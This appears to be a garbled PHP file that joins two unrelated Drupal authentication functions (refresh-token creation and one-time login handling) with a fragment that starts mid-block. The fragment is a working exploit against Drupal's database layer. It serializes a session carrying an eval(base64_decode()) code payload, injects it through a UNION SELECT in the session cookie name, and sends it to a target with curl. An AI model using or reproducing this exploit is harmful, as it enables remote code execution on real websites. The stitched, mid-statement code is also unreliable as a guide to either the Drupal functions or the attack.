/**
* Create a refresh token for the current user
*
* It will delete all the existing refresh tokens for that same user as well.
*
* @param int $uid
* The user ID.
*
* @return \RestfulTokenAuth
* The token entity.
*/
private function generateRefreshToken($uid) {
// Check if there are other refresh tokens for the user.
$query = new \EntityFieldQuery();
$results = $query
->entityCondition('entity_type', 'restful_token_auth')
->entityCondition('bundle', 'refresh_token')
->propertyCondition('uid', $uid)
->execute();
if (!empty($results['restful_token_auth'])) {
// Delete the tokens.
entity_delete_multiple('restful_token_auth', array_keys($results['restful_token_auth']));
}
// Create a new refresh token.
$values = array(
'uid' => $uid,
'type' => 'refresh_token',
'created' => REQUEST_TIME,
'name' => t('Refresh token for: @uid', array(
'@uid' => $uid,
)),
'token' => drupal_random_key(),
);
$refresh_token = $this->create($values);
$this->save($refresh_token);
return $refresh_token;
}
/**
* This is called when an interactive authentication attempt succeeds. This
* is called by authentication listeners inheriting from
* AbstractAuthenticationListener.
*
* @param Request $request
* @param TokenInterface $token
*
* @return Response never null
*/
public function onAuthenticationSuccess(Request $request, TokenInterface $token)
{
list(, $timestamp, ) = $token->getCredentials();
$user = $token->getUser();
$account = $user->getDrupalUser();
watchdog('user', 'User %name used one-time login link at time %timestamp.', array('%name' => $account->name, '%timestamp' => $timestamp));
drupal_set_message(t('You have just used your one-time login link. It is no longer necessary to use this link to log in. Please change your password.'));
// Let the user's password be changed without the current password check.
$token = drupal_random_key();
$_SESSION['pass_reset_' . $account->uid] = $token;
$qs = http_build_query(array('pass-reset-token' => $token), '', '&');
return new RedirectResponse('/user/' . $account->uid . '/edit?' . $qs);
}
$code_inject = str_replace('<' . '?', '', str_replace('<' . '?php', '', str_replace('?' . '>', '', file_get_contents($code))));
} else {
$code_inject = $code;
}
}
$code_inject = rtrim($code_inject, ';');
$code_inject .= ';session_destroy();die("");';
if (strpos($url, 'www.') === 0) {
$url = substr($url, 4);
}
$_SESSION = array('a' => 'eval(base64_decode("' . base64_encode($code_inject) . '"))', 'build_info' => array(), 'wrapper_callback' => 'form_execute_handlers', '#Array' => array('array_filter'), 'string' => 'assert');
$_SESSION['build_info']['args'][0] =& $_SESSION['string'];
list(, $session_name) = explode('://', $url, 2);
// use insecure cookie with sql inj.
$cookieName = 'SESS' . substr(hash('sha256', $session_name), 0, 32);
$password = user_hash_password('test');
$session_id = drupal_random_key();
$sec_ssid = drupal_random_key();
$serial = str_replace('}', 'CURLYCLOSE', str_replace('{', 'CURLYOPEN', "batch_form_state|" . serialize($_SESSION)));
$inject = "UNION SELECT {$user_id},'{$user_name}','{$password}','','','',null,0,0,0,1,null,'',0,'',null,{$user_id},'{$session_id}','','127.0.0.1',0,0,REPLACE(REPLACE('" . $serial . "','CURLYCLOSE',CHAR(" . ord('}') . ")),'CURLYOPEN',CHAR(" . ord('{') . ")) -- ";
$cookie = $cookieName . '[test+' . urlencode($inject) . ']=' . $session_id . '; ' . $cookieName . '[test]=' . $session_id . '; S' . $cookieName . '=' . $sec_ssid;
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, True);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, True);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, False);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:34.0) Gecko/20100101 Firefox/34.0');
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language: en-US,en;q=0.5'));
curl_setopt($ch, CURLOPT_COOKIE, $cookie);
$output = curl_exec($ch);
curl_close($ch);
echo $output;
